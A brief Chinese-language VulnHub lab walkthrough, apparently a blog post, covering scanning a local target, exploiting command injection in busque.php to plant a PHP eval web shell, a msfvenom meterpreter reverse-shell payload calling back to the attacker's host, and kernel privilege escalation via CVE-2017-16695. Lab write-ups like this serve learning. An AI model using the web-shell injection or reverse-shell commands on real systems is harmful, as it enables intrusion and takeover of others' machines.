前言:
习惯事与愿违。
vulnhub打靶系列文章
本次文章只用于
技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
所有环境均为在线下载的靶场,且在本机进行学习。
一、信息收集
首先进行主机的存活探测
netdiscover -r 192.168.56.0/24
之后对其进行端口扫描
nmap -sV -Pn -sC 192.168.56.118
二、反弹shell提权
在网页上发现其一处可有命令执行
对其进行一句话的写入,使用蚁剑连接
http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST[1]);' >a.php
其权限很低
我们上传辅助提权工具,进行探测
但是在蚁剑上都提权失败,查询生成一个php马,将会话发送到msf上。通过蚁剑上传然后浏览器执行。
(这里不知道为啥只有443端口可以反弹成功。。。在这一步疑惑了很久)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php
调用交互shell
python3 -c "import pty;pty.spawn('/bin/bash');"
之后对其进行提权就成功了,使用CVE-2017-16695提权成功